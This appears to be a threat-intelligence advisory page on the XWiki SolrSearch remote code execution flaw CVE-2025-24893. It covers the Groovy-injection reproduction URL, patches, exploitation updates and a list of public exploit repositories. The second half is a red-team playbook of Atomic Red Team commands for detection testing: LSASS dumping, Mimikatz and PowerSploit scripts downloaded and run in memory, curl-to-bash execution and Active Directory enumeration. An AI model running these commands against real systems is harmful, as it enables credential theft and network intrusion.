CVE-2025-24893
Overview
This vulnerability is a remote code execution flaw caused by improper handling of user-supplied input within the SolrSearch feature of the XWiki Platform. The root cause lies in the unsafe evaluation of Groovy scripts embedded in requests to the SolrSearch endpoint, allowing execution of arbitrary code. The affected component is the SolrSearchMacros.xml file, specifically the macro processing logic that fails to sanitize or restrict script execution in RSS feed requests.
Vulnerability Description
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Impact
An unauthenticated attacker can execute arbitrary code on the server hosting the XWiki instance, gaining full control over the platform. This includes the ability to compromise confidentiality by accessing sensitive data, integrity by modifying content or configurations, and availability by disrupting service. No user authentication or interaction is required to exploit this vulnerability, enabling remote attackers to fully compromise the affected system and potentially pivot within the network.
Solution
Users must upgrade XWiki Platform to versions 15.10.11, 16.4.1, or 16.5.0RC1 where the vulnerability is patched. For those unable to upgrade immediately, a workaround involves editing the Main.SolrSearchMacros.xml file at line 955 to modify the rawResponse macro to use content type application/xml instead of application/rss+xml, preventing unsafe script execution. Detailed patch instructions and advisories are available at the XWiki GitHub security advisory page: https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the XWiki Platform allows unauthenticated users to execute arbitrary code remotely through a specific endpoint, namely `SolrSearch`. This flaw arises from improper handling of user input, enabling an attacker to craft a malicious request that can manipulate the execution flow of the application. By exploiting this weakness, an attacker can inject Groovy code into the search query, which the server processes without adequate validation. The result is a significant breach of the application’s security model, leading to potential unauthorized access to sensitive data and system resources.
Attack vectors for this vulnerability are particularly concerning due to the ease of exploitation. An attacker merely needs to send a crafted request to the vulnerable endpoint without requiring any form of authentication. This simplicity lowers the barrier for entry, allowing even those with minimal technical expertise to execute the attack. Once the malicious code is executed, the attacker can perform a variety of actions, including data exfiltration, system manipulation, or even deploying additional malware. The ability to execute arbitrary code remotely poses a severe risk, as it can lead to a complete compromise of the affected XWiki instance and potentially the underlying infrastructure.
The real-world impact of this vulnerability can be devastating for organizations relying on the XWiki Platform for collaboration and knowledge management. The potential for unauthorized access to confidential information can lead to data breaches, loss of intellectual property, and damage to the organization's reputation. Furthermore, the integrity of the data can be compromised, resulting in misinformation or corruption of critical business processes. The availability of the service may also be affected, as attackers could disrupt operations or hold the system hostage through ransomware or other malicious activities. The financial implications of such incidents can be substantial, encompassing legal fees, regulatory fines, and the costs associated with remediation and recovery.
To detect this vulnerability, organizations should implement robust monitoring and logging mechanisms that can identify unusual patterns of access to the `SolrSearch` endpoint. Regular security assessments, including penetration testing and code reviews, can help uncover such vulnerabilities before they are exploited. Additionally, organizations should maintain an inventory of their software assets and ensure that they are running the latest versions, as timely patching is critical in mitigating known vulnerabilities. For those unable to upgrade, a temporary workaround involves modifying the `SolrSearchMacros` to enforce stricter content type handling, thus reducing the risk of arbitrary code execution.
In conclusion, the vulnerability in the XWiki Platform represents a critical security risk that necessitates immediate attention from affected organizations. Given the potential for widespread exploitation and the severe consequences of a successful attack, it is imperative for users to prioritize upgrading to the patched versions. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their valuable assets against malicious actors.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2025-24893, accompanied by the emergence of several new proof-of-concept exploits circulating publicly. Although the EPSS score has experienced a slight decline, this metric does not fully capture the increased adversary interest and expanding toolkit observed in the wild. Our telemetry indicates that threat actors are actively refining their methods to leverage the unauthenticated remote code execution vulnerability in XWiki’s SolrSearch endpoint, signaling a growing operational capability. This escalation heightens the risk of widespread compromise, particularly for organizations with exposed or unpatched XWiki instances. Consequently, the threat level associated with this vulnerability should be considered elevated, reflecting both the intensifying exploitation activity and the broader availability of exploit resources facilitating attacks.
Update 2 — May 24, 2026
CSURFACE threat intelligence has detected a modest but meaningful increase in exploitation attempts targeting CVE-2025-24893, reflected in a rising trend of telemetry signals and a slight uptick in the EPSS score. This escalation, while not rapid, indicates sustained adversary interest and continued refinement of attack techniques against the XWiki SolrSearch endpoint. The emergence of additional proof-of-concept exploits circulating publicly further lowers the barrier for threat actors to weaponize this vulnerability, potentially accelerating exploitation efforts. Given the critical severity and unauthenticated nature of this remote code execution flaw, the observed activity signals an elevated operational risk for organizations running vulnerable XWiki instances. Defenders should interpret this trend as a clear indication that exploitation attempts are becoming more frequent and accessible, thereby increasing the likelihood of successful compromises. Consequently, the threat level associated with CVE-2025-24893 should be considered heightened, reflecting both the growing exploitation momentum and the expanding availability of exploit resources.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-24893, accompanied by the emergence of additional publicly available proof-of-concept exploits. Although the EPSS score remains stable, our telemetry indicates that adversaries are increasingly leveraging diverse tooling to exploit this unauthenticated remote code execution vulnerability in XWiki Platform. This development broadens the attack surface and lowers the technical barrier for threat actors, potentially accelerating the pace of successful intrusions. For defenders, this signals a heightened operational risk as exploitation attempts become more frequent and accessible, underscoring the criticality of this vulnerability in active threat campaigns. Consequently, the overall threat level associated with CVE-2025-24893 should be considered elevated, reflecting both the intensifying exploitation momentum and the expanding availability of exploit resources.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Xwiki | Xwiki | All |
cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
|
|
|
Xwiki | Xwiki | All |
cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
|
|
|
Xwiki | Xwiki | 5.3 |
cpe:2.3:a:xwiki:xwiki:5.3:-:*:*:*:*:*:*
|
|
|
Xwiki | Xwiki | 5.3 |
cpe:2.3:a:xwiki:xwiki:5.3:milestone2:*:*:*:*:*:*
|
|
|
Xwiki | Xwiki | 5.3 |
cpe:2.3:a:xwiki:xwiki:5.3:rc1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)
exploits/multi/http/xwiki_unauth_rce_cve_2025_24893
|
Maksim Rogov, John Kwak | Unknown | unix, linux | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE) | Maksim Rogov | webapps | multiple | - | View |
| XWiki Platform 15.10.10 - Remote Code Execution | Al Baradi Joy | webapps | multiple | - | View |
GitHub PoCs (41)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
gunzf0x/CVE-2025-24893
PoC for CVE-2025-24893: XWiki' Remote Code Execution exploit for versions prior to 15.10.11, 16.4.1 and 16.5.0RC1.
|
gunzf0x | 22 | 3 | 2025-08-04 | View |
|
dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (versions < 15.10.11, 16.4.1, ...
|
dollarboysushil | 17 | 2 | 2025-08-04 | View |
|
b0ySie7e/CVE-2025-24893
|
b0ySie7e | 11 | 3 | 2025-09-03 | View |
|
iSee857/CVE-2025-24893-PoC
XWiki SolrSearchMacros 远程代码执行漏洞PoC(CVE-2025-24893)
|
iSee857 | 10 | 2 | 2025-02-25 | View |
|
AliElKhatteb/CVE-2024-32019-POC
this is a poc for the CVE-2025-24893
|
AliElKhatteb | 5 | 2 | 2025-08-03 | View |
|
Infinit3i/CVE-2025-24893
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groo...
|
Infinit3i | 6 | 1 | 2025-08-03 | View |
|
Hex00-0x4/CVE-2025-24893-XWiki-RCE
This vulnerability could allow a malicious user to execute remote code by sending appropriately crafted requests to the ...
|
Hex00-0x4 | 6 | 0 | 2025-08-08 | View |
|
D3Ext/CVE-2025-24893
POC exploit for CVE-2025-24893
|
D3Ext | 4 | 2 | 2025-08-09 | View |
|
hackersonsteroids/cve-2025-24893
Modified exploit for CVE-2025-24893
|
hackersonsteroids | 5 | 0 | 2025-08-03 | View |
|
570RMBR3AK3R/xwiki-cve-2025-24893-poc
PoC for CVE-2025-24893
|
570RMBR3AK3R | 3 | 1 | 2025-08-06 | View |
|
nopgadget/CVE-2025-24893
|
nopgadget | 3 | 0 | 2025-08-02 | View |
|
Artemir7/CVE-2025-24893-EXP
|
Artemir7 | 2 | 0 | 2025-05-05 | View |
|
BreakingRohit/CVE-2025-24893-PoC
Proof of Concept for CVE-2025-24893 demonstrating unauthenticated remote command execution in XWiki through unsafe serve...
|
BreakingRohit | 2 | 0 | 2025-12-28 | View |
|
vasilysaint/CVE-2025-24893
OSCP like CVE-2025-24893 exploit for Linux XWiki
|
vasilysaint | 1 | 0 | 2026-06-10 | View |
|
IIIeJlyXaKapToIIIKu/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source e...
|
IIIeJlyXaKapToIIIKu | 1 | 0 | 2025-08-07 | View |
|
Th3Gl0w/CVE-2025-24893-POC
|
Th3Gl0w | 1 | 0 | 2025-08-07 | View |
|
x0da6h/POC-for-CVE-2025-24893
Some poorly crafted exploit scripts
|
x0da6h | 1 | 0 | 2025-08-22 | View |
|
torjan0/xwiki_solrsearch-rce-exploit
Unauth RCE PoC for XWiki SolrSearch (CVE-2025-24893). Command exec + reverse shell.
|
torjan0 | 1 | 0 | 2025-08-26 | View |
|
80Ottanta80/CVE-2025-24893-PoC
XWiki Unauthenticated RCE Exploit for Reverse Shell
|
80Ottanta80 | 1 | 0 | 2025-11-03 | View |
|
endusdksla/xwiki-cve-2025-24893
|
endusdksla | 0 | 0 | 2026-07-09 | View |
|
Fomovet/cve-2025-24893
POC for CVE-2025-24893
|
Fomovet | 0 | 0 | 2026-06-21 | View |
|
kimtangker/CVE-2025-24893
CVE-2025-24893 tool
|
kimtangker | 0 | 0 | 2025-10-14 | View |
|
hasecto/CVE-2025-24893
Exploit de Execução Remota de Código (RCE) no XWiki
|
hasecto | 0 | 0 | 2026-05-29 | View |
|
rippsec/CVE-2025-24893-XWiki-SSTI-RCE
CVE-2025-24893 – XWiki SSTI unauthenticated RCE exploit (HackTheBox CTF)
|
rippsec | 0 | 0 | 2026-04-16 | View |
|
AzureADTrent/CVE-2025-24893-Reverse-Shell
Reverse Shell Payload for CVE-2025-24893
|
AzureADTrent | 0 | 0 | 2025-08-03 | View |
|
gmh5225/CVE-2025-24893-RCE-PoC
This is a small script for the rce vulnerability for CVE-2025-24893. It supports basic input/output
|
gmh5225 | 0 | 0 | 2025-08-03 | View |
|
investigato/cve-2025-24893-poc
Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exp...
|
investigato | 0 | 0 | 2025-08-05 | View |
|
mah4nzfr/CVE-2025-24893
Bash POC script for RCE vulnerability in XWiki Platform
|
mah4nzfr | 0 | 0 | 2025-08-07 | View |
|
The-Red-Serpent/CVE-2025-24893
POC
|
The-Red-Serpent | 0 | 0 | 2025-08-08 | View |
|
alaxar/CVE-2025-24893
XWiki 15.10.11, 16.4.1 and 16.5.0RC1 Unauthenticated Remote code execution POC
|
alaxar | 0 | 0 | 2025-08-08 | View |
|
Retro023/CVE-2025-24893-POC
A POC for CVE-2025-24893 written in python
|
Retro023 | 0 | 0 | 2025-08-09 | View |
|
CMassa/CVE-2025-24893
PoC exploit for XWiki Remote Code Execution Vulnerability (CVE-2025-24893)
|
CMassa | 0 | 0 | 2025-08-13 | View |
|
0xDTC/XWiki-Platform-RCE-CVE-2025-24893
|
0xDTC | 0 | 0 | 2025-12-03 | View |
|
TomKingori/xwiki-cve-2025-24893-exploit
Unauthenticated RCE exploit for XWiki CVE-2025-24893 via Groovy script injection
|
TomKingori | 0 | 0 | 2026-01-09 | View |
|
nohack1212/CVE-2025-24893-
CVE-2025-24893 | Vulnérabilité d'exécution de code à distance sur la plateforme XWiki (preuve de concept)
|
nohack1212 | 0 | 0 | 2026-01-26 | View |
|
dhiaZnaidi/CVE-2025-24893-PoC
|
dhiaZnaidi | 0 | 0 | 2025-08-03 | View |
|
zs1n/CVE-2025-24893
PoC | XWiki Platform 15.10.10 - Remote Code Execution
|
zs1n | 0 | 0 | 2025-08-05 | View |
|
Bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
CVE-2025-24893 RCE exploit for XWiki with reverse shell capability
|
Bishben | 0 | 0 | 2025-09-10 | View |
|
andwati/CVE-2025-24893
|
andwati | 0 | 0 | 2025-09-05 | View |
|
o0wo0o/CVE-2025-24893_Shell
|
o0wo0o | 0 | 0 | 2025-12-15 | View |
|
ibadovulfat/CVE-2025-24893
A critical remote code execution (RCE) vulnerability (CVE‑2025‑24893) exists in the XWiki Platform, specifically in the ...
|
ibadovulfat | 0 | 0 | 2025-08-26 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
